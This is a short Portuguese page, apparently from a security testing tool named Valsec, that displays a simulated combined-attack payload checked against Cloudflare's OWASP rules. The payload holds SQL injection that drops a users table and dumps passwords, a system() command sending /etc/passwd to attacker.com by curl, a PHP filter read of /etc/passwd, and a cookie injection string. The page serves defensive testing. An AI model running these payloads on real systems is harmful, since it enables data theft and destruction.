Valsec
vA
Cloudflare
Descrição do Teste
Este teste simula um ataque que combina múltiplas técnicas (SQL Injection, XSS, etc.) em um único payload, o que poderia aumentar as chances de sucesso ao tentar contornar mecanismos de segurança.
Payload Detectado
SQL: SELECT * FROM users WHERE username = '' OR 1=1; DROP TABLE users; --> UNION SELECT username,password FROM users WHERE 1=1; --';
EXEC: system("' OR 1=1; DROP TABLE users; --> ; cat /etc/passwd | curl -d @- https://attacker.com/exfil");
INCLUDE: include("' OR 1=1; DROP TABLE users; --> php://filter/convert.base64-encode/resource=/etc/passwd");
HTML: ' OR 1=1; DROP TABLE users; --> 
COOKIE: document.cookie="' OR 1=1; DROP TABLE users; -->; path=/; domain=.example.com"
Alerta de Segurança
Este é um teste de segurança para verificar proteções contra ataques de Combined Attack. Em um ambiente real, este tipo de requisição seria bloqueado pelo Cloudflare OWASP Core Ruleset.
Voltar
Valsec - Versão: A